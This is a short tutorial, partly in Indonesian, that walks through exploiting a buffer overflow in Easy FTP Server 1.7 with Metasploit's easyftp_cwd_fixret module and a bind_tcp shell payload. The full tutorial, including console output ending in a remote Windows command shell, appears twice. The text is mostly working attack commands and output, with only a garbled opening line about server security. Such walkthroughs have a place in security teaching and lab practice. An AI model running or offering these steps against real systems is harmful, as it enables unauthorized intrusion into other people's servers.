Security of an application server that we use to get attention, because if we do not notice any further then we conceded a computer hacked by someone else who is not liable to be larger.
FTP Server is a server that uses the File Transfer Protocol (FTP) for file transfers between machines on the network TCP / IP, here there are vulnerabilities in applications Easy FTP Server buffer overflow in version 1.7 for which we can use it by entering input in the form of exploit so the data stored exceeds the capacity of buffer memory. The bottom line with the process then we can incorporate a variety of shellcode to run on the server, eg bind a shell.
Here we can use the Metasploit Framework 3.71 or higher.
_ _
_ | | (_)_
____ ____| |_ ____ ___ ____ | | ___ _| |_
| \ / _ ) _)/ _ |/___) _ \| |/ _ \| | _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
|_| =[ metasploit v3.7.1-release [core:3.7 api:1.0]
+ — –=[ 688 exploits - 357 auxiliary - 39 post
+ -- --=[ 217 payloads - 27 encoders - 8 nops
=[ svn r12635 updated 64 days ago (2011.05.16)
Warning: This copy of the Metasploit Framework was last updated 64 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
http://www.metasploit.com/redmine/projects/framework/wiki/Updating
msf exploit(easyftp_cwd_fixret) > use exploit/windows/ftp/easyftp_cwd_fixret
Kita menggunakan exploit easyftp_cwd_fixret
msf exploit(easyftp_cwd_fixret) > set PAYLOAD windows/shell/bind_tcp
Kita memilih payload bind_tcp
PAYLOAD => windows/shell/bind_tcp
msf exploit(easyftp_cwd_fixret) > set RHOST 192.168.1.18
Contoh target kita adalah 192.168.1.18
RHOST => 192.168.1.18
msf exploit(easyftp_cwd_fixret) > exploit
Setelah itu tinggal kita ketik exploit seperti diatas lalu enter
[*] Started bind handler
[*] Prepending fixRet…
[*] Adding the payload…
[*] Overwriting part of the payload with target address…
[*] Sending exploit buffer…
[*] Sending stage (240 bytes) to 192.168.1.18
[*] Command shell session 1 opened (192.168.1.10:2598 -> 192.168.1.18:4444) at 2011-07-19 03:32:43 +0700
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\ftp\easyftpsvr-1.7.0.2>
Binggo, anda mendapatkan shell di server FTP Target.
Oleh : Kurniawan
FTP Server is a server that uses the File Transfer Protocol (FTP) for file transfers between machines on the network TCP / IP, here there are vulnerabilities in applications Easy FTP Server buffer overflow in version 1.7 for which we can use it by entering input in the form of exploit so the data stored exceeds the capacity of buffer memory. The bottom line with the process then we can incorporate a variety of shellcode to run on the server, eg bind a shell.
Here we can use the Metasploit Framework 3.71 or higher.
_ _
_ | | (_)_
____ ____| |_ ____ ___ ____ | | ___ _| |_
| \ / _ ) _)/ _ |/___) _ \| |/ _ \| | _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
|_| =[ metasploit v3.7.1-release [core:3.7 api:1.0]
+ — –=[ 688 exploits - 357 auxiliary - 39 post
+ -- --=[ 217 payloads - 27 encoders - 8 nops
=[ svn r12635 updated 64 days ago (2011.05.16)
Warning: This copy of the Metasploit Framework was last updated 64 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
http://www.metasploit.com/redmine/projects/framework/wiki/Updating
msf exploit(easyftp_cwd_fixret) > use exploit/windows/ftp/easyftp_cwd_fixret
Kita menggunakan exploit easyftp_cwd_fixret
msf exploit(easyftp_cwd_fixret) > set PAYLOAD windows/shell/bind_tcp
Kita memilih payload bind_tcp
PAYLOAD => windows/shell/bind_tcp
msf exploit(easyftp_cwd_fixret) > set RHOST 192.168.1.18
Contoh target kita adalah 192.168.1.18
RHOST => 192.168.1.18
msf exploit(easyftp_cwd_fixret) > exploit
Setelah itu tinggal kita ketik exploit seperti diatas lalu enter
[*] Started bind handler
[*] Prepending fixRet…
[*] Adding the payload…
[*] Overwriting part of the payload with target address…
[*] Sending exploit buffer…
[*] Sending stage (240 bytes) to 192.168.1.18
[*] Command shell session 1 opened (192.168.1.10:2598 -> 192.168.1.18:4444) at 2011-07-19 03:32:43 +0700
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\ftp\easyftpsvr-1.7.0.2>
Binggo, anda mendapatkan shell di server FTP Target.
Oleh : Kurniawan